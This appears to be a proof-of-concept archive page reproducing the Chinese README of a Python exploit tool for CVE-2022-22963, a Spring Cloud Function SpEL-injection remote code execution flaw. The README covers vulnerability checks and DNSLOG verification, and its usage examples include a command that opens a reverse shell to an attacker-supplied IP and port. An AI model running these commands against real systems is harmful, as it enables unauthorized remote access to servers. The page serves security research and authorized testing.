Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source
Associated Vulnerability
Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
Description
CVE-2022-22963-poc
Readme
# CVE-2022-22963 漏洞检测与利用工具
![License](https://img.shields.io/badge/license-MIT-blue.svg)
![Python](https://img.shields.io/badge/python-3.6%2B-blue)

## 漏洞简介

CVE-2022-22963 是 Spring Cloud Function 中的一个远程代码执行漏洞。该漏洞存在于 Spring Cloud Function 的路由功能中,攻击者可以通过发送特制的 HTTP 请求,利用 SpEL 表达式注入执行任意代码。

受影响版本:
- Spring Cloud Function < 3.1.7
- Spring Cloud Function < 3.2.3

## 工具功能

本工具提供以下功能:
- 漏洞检测:验证目标系统是否存在 CVE-2022-22963 漏洞
- DNSLOG 验证:通过 DNS 请求验证漏洞的可利用性
- 反弹 Shell:利用漏洞获取目标系统的反弹 Shell

## 环境要求

- Python 3.6+
- 依赖库:requests

安装依赖:
```bash
pip install requests
```

## 使用方法

### 基本用法

```bash
python3 CVE-2022-22963.py -u <目标URL> [选项]
```

### 参数说明

#### 基本参数
| 参数 | 说明 |
|------|------|
| `-h, --help` | 显示帮助信息 |
| `-u, --url` | 目标URL |
| `-v, --check` | 检测漏洞 |

#### 漏洞利用参数
| 参数 | 说明 |
|------|------|
| `-m, --mode {dnslog,shell}` | 利用方式: dnslog或shell |
| `-i, --ip` | 反弹shell的IP地址 |
| `-d, --dns` | dnslog网址 |

#### 高级选项
| 参数 | 说明 |
|------|------|
| `-p, --port` | 反弹shell端口 (默认: 9999) |
| `-t, --timeout` | 请求超时时间(秒) (默认: 5) |

## 使用示例

### 漏洞检测

```bash
python3 CVE-2022-22963.py -u http://example.com -v
```

### DNSLOG 验证

```bash
python3 CVE-2022-22963.py -u http://example.com -m dnslog -d your-domain.dnslog.cn
```

### 反弹 Shell

```bash
python3 CVE-2022-22963.py -u http://example.com -m shell -i your-server-ip -p 9999
```

## 工具演示

### 1. 漏洞检测

![漏洞检测](https://github.com/xmqaq/CVE-2022-22963/assets/50257557/d8cf5807-7c5e-405c-9643-570523159761)

### 2. DNSLOG 验证

![DNSLOG验证1](https://github.com/xmqaq/CVE-2022-22963/assets/50257557/2401bacc-d0a4-46e9-a860-a58414d24c26)

![DNSLOG验证2](https://github.com/xmqaq/CVE-2022-22963/assets/50257557/a93fc69d-e8e3-4c8d-a10c-d274216370bc)

### 3. 反弹 Shell

![反弹Shell1](https://github.com/xmqaq/CVE-2022-22963/assets/50257557/b5a1dd93-9940-4742-a174-6df594b3fda6)

![反弹Shell2](https://github.com/xmqaq/CVE-2022-22963/assets/50257557/e4da3b1b-ceda-4ffa-b0c3-95afeacfa332)

## 更新日志

- 2023.12.28: 初始版本发布
- 2025.10.9: 代码重构,优化参数处理和错误处理

## 作者

- xmqaq

## 免责声明

本工具仅用于**安全研究、授权测试和教育目的**。使用本工具进行任何未经授权的测试或攻击行为是违法的,可能导致严重的法律后果。

使用本工具即表示您同意:
1. 仅在获得明确授权的系统上使用本工具
2. 遵守所有适用的法律法规
3. 对使用本工具造成的任何后果负完全责任

作者不对任何人因使用本工具而直接或间接导致的任何损失或损害承担责任。

**请负责任地使用本工具!**

## 许可证

本项目采用 MIT 许可证 - 详情请参阅 [LICENSE](LICENSE) 文件

File Snapshot

[4.0K] /data/pocs/02e0c742f98a464c2e9932b3d62936dc785aabd9 ├── [7.2K] CVE-2022-22963.py └── [3.1K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →